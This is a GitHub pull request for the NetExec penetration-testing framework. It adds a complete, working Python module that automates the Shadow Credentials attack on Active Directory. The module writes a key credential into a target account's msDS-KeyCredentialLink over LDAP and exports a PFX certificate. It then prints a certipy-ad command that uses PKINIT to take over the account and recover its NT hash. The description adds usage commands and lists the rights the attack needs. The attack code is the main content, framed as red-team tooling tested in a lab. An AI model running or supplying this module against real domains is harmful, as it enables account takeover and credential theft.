### PR TITLE
Added Shadow Credentials Module

### DIFF
--- a/nxc/modules/shadow-creds.py
+++ b/nxc/modules/shadow-creds.py
@@ -1,0 +1,266 @@
+# shadow_creds.py — NXC module for Shadow Credentials / PKINIT abuse
+# adds a key credential to msDS-KeyCredentialLink, grabs a PFX, done
+#
+# author: @SoftAndoWetto
+# usage:  nxc ldap <dc> -u <user> -p <pass> -M shadow-creds -o TARGET=<samname>
+
+from nxc.helpers.misc import CATEGORY
+from nxc.paths import TMP_PATH
+from datetime import datetime
+from pathlib import Path
+from types import SimpleNamespace
+import secrets
+import string
+
+from pywhisker.pywhisker import ShadowCredentials, init_ldap_session
+import impacket.ldap.ldap as ldap_impacket
+
+
+# impacket doesn't accept a 'signing' kwarg in newer builds — patch it out
+if not getattr(ldap_impacket.LDAPConnection, "_nxc_patched", False):
+    _orig_init = ldap_impacket.LDAPConnection.__init__
+
+    def _patched_init(self, *args, **kwargs):
+        kwargs.pop("signing", None)
+        return _orig_init(self, *args, **kwargs)
+
+    ldap_impacket.LDAPConnection.__init__ = _patched_init
+    ldap_impacket.LDAPConnection._nxc_patched = True
+
+
+# thin wrapper so pywhisker log calls go through nxc's logger
+# verbosity=0 by default to keep noise down
+class _PywLoggerAdapter:
+    def __init__(self, context, verbosity=0):
+        self.context = context
+        self.verbosity = verbosity
+        self.perm_denied = False
+        self.not_found = False
+
+        self._denied_patterns = ("insuff_access_rights", "00002098")
+        # pywhisker raises "does not exist" both via logger.error and as an exception
+        self._notfound_patterns = ("user not found", "does not exist")
+
+    def info(self, msg):
+        self.context.log.info(msg)
+
+    def success(self, msg):
+        self.context.log.success(msg)
+
+    def verbose(self, msg):
+        if self.verbosity >= 2:
+            self.context.log.info(msg)
+
+    def debug(self, msg):
+        if self.verbosity >= 1:
+            self.context.log.debug(msg)
+
+    # pywhisker calls warning() in some paths — prevent AttributeError
+    def warning(self, msg):
+        self.context.log.highlight(msg)
+
+    def error(self, msg):
+        txt = str(msg).lower()
+
+        # Treat PFX creation failure as permission/ACL failure
+        if any(p in txt for p in (
+            "insuff_access_rights",
+            "00002098",
+            "failed to create pfx",
+            "access is denied",
+            "constraint violation"
+        )):
+            self.perm_denied = True
+            if self.verbosity >= 2:
+                self.context.log.debug(str(msg))
+            return
+
+        if any(p in txt for p in self._notfound_patterns):
+            self.not_found = True
+            if self.verbosity >= 2:
+                self.context.log.debug(str(msg))
+            return
+
+        self.context.log.error(msg)
+
+
+class NXCModule:
+    name = "shadow-creds"
+    description = "Shadow Credentials attack - add key credential for PKINIT authentication"
+    supported_protocols = ["ldap"]
+    category = CATEGORY.PRIVILEGE_ESCALATION
+
+    def __init__(self):
+        self.domain = None
+        self.dc_ip = None
+        self.username = None
+        self.password = None
+        self.nthash = None
+
+        self.target = None
+        self.pfx_pass = None
+        self.out_dir = None
+
+    def options(self, context, module_options):
+        self.target = module_options.get("TARGET")
+        if not self.target:
+            context.log.fail("TARGET is required")
+            return
+
+        self.pfx_pass = module_options.get("PFXPASS")
+
+        ts = datetime.now().strftime("%Y%m%d-%H%M%S")
+        default = Path(TMP_PATH) / f"shadow-creds-{self.target}-{ts}"
+        self.out_dir = Path(module_options.get("OUTDIR") or default).resolve()
+
+        return {
+            "TARGET": self.target,
+            "PFXPASS": "<auto>" if not self.pfx_pass else "<provided>",
+            "OUTDIR": str(self.out_dir),
+        }
+
+    def _gather_conn_info(self, connection):
+        self.domain = getattr(connection, "domain", None)
+        self.dc_ip = getattr(connection, "dc_ip", None) or getattr(connection, "host", None)
+        self.username = getattr(connection, "username", None)
+        self.password = getattr(connection, "password", None)
+        self.nthash = getattr(connection, "nthash", None)
+
+    def _get_ldap_session(self):
+        args = SimpleNamespace(
+            dc_ip=self.dc_ip,
+            dc_host=None,
+            use_ldaps=False,
+            use_schannel=False,
+            use_kerberos=False,
+            auth_hashes=None,
+            auth_key=None,
+            crt=None,
+            key=None,
+        )
+
+        password = self.password or ""
+        lmhash = ""
+        nthash = (self.nthash or "").lower()
+
+        # hash auth — split LM:NT if needed, pass auth_hashes so pywhisker knows to use it
+        if nthash:
+            if ":" in nthash:
+                lmhash, _, nt_only = nthash.partition(":")
+                lmhash = lmhash or ""
+                nthash = nt_only
+            args.auth_hashes = f"{lmhash}:{nthash}"
+            password = ""
+
+        srv, sess = init_ldap_session(
+            args,
+            self.domain,
+            self.username,
+            password,
+            lmhash,
+            nthash
+        )
+
+        return srv, sess
+
+    def _run_shadow_flow(self, context, connection):
+        ldap_server, ldap_session = self._get_ldap_session()
+        logger = _PywLoggerAdapter(context)
+
+        self.out_dir.mkdir(parents=True, exist_ok=True)
+
+        if not self.pfx_pass:
+            self.pfx_pass = "".join(
+                secrets.choice(string.ascii_letters + string.digits)
+                for _ in range(24)
+            )
+
+        base_path = str(self.out_dir / self.target)
+
+        sc = ShadowCredentials(
+            ldap_server,
+            ldap_session,
+            target_samname=self.target,
+            target_domain=self.domain,
+            logger=logger
+        )
+
+        try:
+            result = sc.add(
+                password=self.pfx_pass,
+                path=base_path,
+                export_type="PFX",
+                domain=self.domain,
+                target_domain=self.domain
+            )
+
+            # pywhisker may fail silently and return False
+            if result is False:
+                context.log.fail(
+                    f"Access denied: '{self.username}' does not have rights over '{self.target}' "
+                    f"(msDS-KeyCredentialLink modification not permitted)"
+                )
+                return
+
+        except Exception as e:
+            txt = str(e).lower()
+
+            if any(p in txt for p in (
+                "insuff_access_rights",
+                "00002098",
+                "failed to create pfx",
+                "access is denied"
+            )):
+                context.log.fail(
+                    f"Access denied: '{self.username}' cannot modify '{self.target}' "
+                    f"(insufficient rights on msDS-KeyCredentialLink)"
+                )
+                return
+
+            if any(p in txt for p in logger._notfound_patterns):
+                context.log.fail(f"Target '{self.target}' not found — check the sAMAccountName and domain")
+                return
+
+            context.log.error(f"Attack failed: {e}")
+            return
+
+        # check logger flags first — pywhisker sometimes returns without raising
+        if logger.not_found:
+            context.log.fail(f"Target '{self.target}' not found — check the sAMAccountName and domain")
+            return
+
+        if logger.perm_denied:
+            context.log.fail(f"Access denied on msDS-KeyCredentialLink for '{self.target}' — need GenericWrite or equivalent")
+            return
+
+        # check exact path first, fall back to glob in case pywhisker appended its own suffix
+        pfx_path = Path(base_path + ".pfx")
+        if logger.perm_denied:
+            context.log.fail(
+                f"Access denied: no PFX was created for '{self.target}' "
+                f"(insufficient privileges on msDS-KeyCredentialLink)"
+            )
+            return
+
+        final_path = pfx_path if pfx_path.exists() else None
+
+        if final_path:
+            context.log.success("=" * 60)
+            context.log.success("SHADOW CREDENTIALS SUCCESS!")
+            context.log.success("=" * 60)
+            context.log.success(f"Target: {self.target}")
+            context.log.success(f"PFX: {final_path}")
+            context.log.success(f"Password: {self.pfx_pass}")
+            context.log.success("=" * 60)
+            context.log.info(f"certipy-ad auth -pfx '{final_path}' -password '{self.pfx_pass}'")
+        else:
+            context.log.fail(f"PFX not found after add — check {self.out_dir} manually")
+
+    def on_login(self, context, connection):
+        if not self.target or not self.out_dir:
+            return
+        try:
+            self._gather_conn_info(connection)
+            self._run_shadow_flow(context, connection)
+        except Exception as e:
+            context.log.error(f"Module failed: {e}")

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -44,6 +44,7 @@ dependencies = [
     "termcolor>=2.4.0",
     "terminaltables3>=4.0.0",
     "xmltodict>=0.13.0",
+    "pywhisker>=0.1.2",
     # Git Dependencies
     "certipy-ad @ git+https://github.com/Pennyw0rth/Certipy",
     "impacket @ git+https://github.com/Pennyw0rth/impacket",

--- a/tests/e2e_commands.txt
+++ b/tests/e2e_commands.txt
@@ -241,6 +241,7 @@ netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M whoami
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M dump-computers
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M raisechild
 netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M get-scriptpath
+netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M shadow-creds -o "TARGET=SAMNAME"
 ##### WINRM
 netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS # need an extra space after this command due to regex
 netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig


### PR DESCRIPTION
## Description

Adds a new LDAP module `shadow-creds` that automates the Shadow Credentials attack against Active Directory targets.

The module writes a key credential to the target account's `msDS-KeyCredentialLink` attribute via LDAP, then exports a PFX certificate for use with `certipy-ad` to perform PKINIT authentication and retrieve an NT hash.

**Key features:**
- Auto-generates a random 24-character PFX password if one is not supplied
- Hybrid PFX path resolution (exact path + glob fallback) to handle pywhisker suffix behaviour
- Thin logger adapter routing pywhisker output through nxc's logger, with access-denied and user-not-found signals surfaced cleanly
- Patches impacket's `LDAPConnection.__init__` to drop the unsupported `signing` kwarg present in newer builds

**Dependencies:**
- `pywhisker` (pip: `pywhisker`)
- `impacket`

**AI assistance:** Initial module structure and logger adapter were drafted with assistance from Claude (Anthropic). All logic was reviewed, tested, and modified manually..

---

## Type of change

- [ ] Bug fix (non-breaking change which fixes an issue)
- [x] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] Deprecation of feature or functionality
- [ ] This change requires a documentation update
- [x] This requires a third party update (such as Impacket, Dploot, lsassy, etc) — requires `pywhisker`
- [x] This PR was created with the assistance of AI — Claude (Anthropic), used for initial scaffolding and comment style. Logic reviewed and tested manually.

---

## Setup guide for the review

**Local environment:**
- OS: Kali Linux (rolling)
- Python: 3.11
- NetExec installed via `pipx` / dev clone

**Target:**
- Windows Server 2019 (Build 17763)
- Domain: `enclave.local`
- DC IP: tested against a local lab DC

**Dependencies to install:**
```bash
pip install pywhisker
```

**To test the full module:**
```bash
nxc ldap <dc_ip> -u <user> -p <pass> -M shadow-creds -o TARGET=<samaccountname>

# Authenticate with the resulting PFX
certipy-ad auth -pfx /tmp/nxc_shadow/<target>.pfx -password <auto-generated>
```

**Note:** The attacking account requires `GenericWrite` or `GenericAll` over the target, or explicit write access to `msDS-KeyCredentialLink`. The DC must support PKINIT (i.e. have a CA or support Windows Hello for Business key trust).

---

## Screenshots
Success:
<img width="1781" height="290" alt="Success" src="https://github.com/user-attachments/assets/ec6d95db-03e4-4b75-8bd9-a1272b73b616" />
Output:
<img width="813" height="286" alt="Output" src="https://github.com/user-attachments/assets/d6f32c56-937e-4684-8a5e-6ffbb95d759e" />

Fail:
<img width="1780" height="139" alt="Fail" src="https://github.com/user-attachments/assets/9b29115a-8578-48d3-9630-73701031f032" />
Invalid Permissions:
<img width="1775" height="117" alt="Invalid Permissions" src="https://github.com/user-attachments/assets/0e7e8479-8b20-4c71-bacb-f0f901041394" />
Invalid Name:
<img width="1775" height="109" alt="Invlaid Name" src="https://github.com/user-attachments/assets/aca4a793-ede3-43b8-b71f-426157b8b30c" />




---

## Checklist

- [x] I have ran Ruff against my changes (`poetry run ruff check .`)
- [x] I have added or updated the `tests/e2e_commands.txt` file if necessary
- [x] If reliant on changes of third party dependencies, such as Impacket, dploot, lsassy, etc, I have linked the relevant PRs in those projects - pywhisker: https://github.com/ShutdownRepo/pywhisker
- [x] I have linked relevant sources that describe the added technique:
  - https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab
  - https://github.com/ShutdownRepo/pywhisker
  - https://github.com/ly4k/Certipy
- [x] I have performed a self-review of my own code
- [x] I have commented my code, particularly in hard-to-understand areas
- [ ] I have made corresponding changes to the documentation (PR here: https://github.com/Pennyw0rth/NetExec-Wiki)